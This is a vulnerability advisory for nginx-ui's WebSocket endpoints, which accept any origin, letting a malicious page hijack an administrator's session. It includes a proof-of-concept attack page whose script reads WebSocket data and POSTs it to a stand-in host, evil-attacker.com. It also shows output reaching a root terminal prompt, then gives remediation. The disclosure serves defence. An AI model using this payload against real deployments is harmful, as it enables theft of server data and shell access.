Nginx-UI: Cross-Site WebSocket Hijacking (CSWSH) via missing origin validation on all WebSocket endpoints

Summary

All WebSocket endpoints in nginx-ui use a gorilla/websocket Upgrader with CheckOrigin unconditionally returning true, allowing Cross-Site WebSocket Hijacking (CSWSH). Combined with the fact that authentication tokens are stored in browser cookies (set via JavaScript without HttpOnly or explicit SameSite attributes), a malicious webpage can establish authenticated WebSocket connections to the nginx-ui instance when a logged-in administrator visits the attacker-controlled page.

Details

Vulnerable Code Pattern

Every WebSocket endpoint in the codebase uses the same unsafe upgrader configuration:

// Found in: api/terminal/pty.go, api/analytic/analytic.go, api/event/websocket.go,
// api/nginx_log/websocket.go, api/upstream/upstream.go, api/cluster/websocket.go,
// api/nginx/websocket.go, api/certificate/revoke.go, api/sites/websocket.go,
// api/llm/llm.go, api/llm/code_completion.go, api/system/upgrade.go
var upgrader = websocket.Upgrader{
    CheckOrigin: func(r *http.Request) bool {
        return true // Accepts ALL origins
    },
}

Cookie-Based Authentication

The Vue.js frontend stores JWT tokens as cookies without security attributes (app/src/pinia/moudule/user.ts):

watch(token, v => {
    cookies.set('token', v, { maxAge: 86400 })  // No HttpOnly, no SameSite
})

The backend middleware accepts tokens from cookies (internal/middleware/middleware.go):

func getToken(c *gin.Context) (token string) {
    // ...
    if token, _ = c.Cookie("token"); token != "" {
        return token
    }
    return ""
}

Affected Endpoints

All WebSocket endpoints under the authenticated router group are vulnerable:

Endpoint	Impact
/api/nginx/detail_status/ws	Leak nginx performance metrics and configuration
/api/events	Leak system processing events
/api/analytic/intro	Leak CPU, memory, disk, network statistics
/api/nginx_log	Read nginx log files (access/error logs)
/api/pty	Interactive terminal access (RCE if OTP not enabled)
/api/upgrade/perform	Trigger system binary upgrade
/api/cluster/nodes/enabled	Leak and manipulate cluster node data

PoC

Environment Setup

services:
  nginx-ui:
    image: uozi/nginx-ui:latest
    ports:
      - "9000:80"
    volumes:
      - nginx-ui-config:/etc/nginx-ui
volumes:
  nginx-ui-config:

Attack Page (hosted on attacker-controlled domain)

<script>
// Attacker page at http://evil-attacker.com
// Victim must be logged into nginx-ui
const ws = new WebSocket('ws://TARGET_NGINX_UI:9000/api/nginx/detail_status/ws');
ws.onopen = () => console.log('CSWSH: Connected from malicious origin!');
ws.onmessage = (e) => {
    console.log('Stolen data:', e.data);
    fetch('https://evil-attacker.com/collect', {method:'POST', body: e.data});
};
</script>

Automated PoC Results

[+] VULNERABLE! WebSocket connected from http://evil-attacker.com
[+] Received: {"stub_status_enabled":false,"running":true,"info":{"active":0,...}}

[+] VULNERABLE! Event stream from http://evil-attacker.com
[+] Received: {"event":"processing_status","data":{"index_scanning":false,...}}

[+] VULNERABLE! Analytics from http://evil-attacker.com
[+] Received: {"avg_load":{"load1":0.1,"load5":0.2},"cpu_percent":0.08,...}

[+] CRITICAL: Terminal connected from http://evil-attacker.com!
[+] Terminal output: 'eae7a76e3ef4 login: '
[*] Sent username: root
[+] Output: 'Password: '

[+] Control test (no auth): Correctly rejected with HTTP 403

Impact

An attacker can create a malicious webpage that, when visited by an authenticated nginx-ui administrator, silently:

1. Steals sensitive server information -- nginx configuration, performance metrics, CPU/memory/disk usage, network traffic statistics, and system events
2. Reads nginx log files -- potentially containing sensitive request data, IP addresses, and authentication tokens
3. Gains interactive terminal access -- if the administrator has not enabled OTP/2FA, the attacker obtains a full PTY shell on the server, achieving Remote Code Execution
4. Triggers system operations -- including nginx reload/restart and binary upgrades

The attack requires no privileges and no knowledge of the victim's credentials. The only user interaction needed is visiting a webpage.

Remediation

1. Implement proper origin validation in all WebSocket upgraders:

var upgrader = websocket.Upgrader{
    CheckOrigin: func(r *http.Request) bool {
        origin := r.Header.Get("Origin")
        return isAllowedOrigin(origin)
    },
}

2. Set secure cookie attributes:

cookies.set('token', v, { maxAge: 86400, sameSite: 'strict', secure: true })

3. Add CSRF token validation to WebSocket upgrade requests as defense-in-depth.

A patch is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.5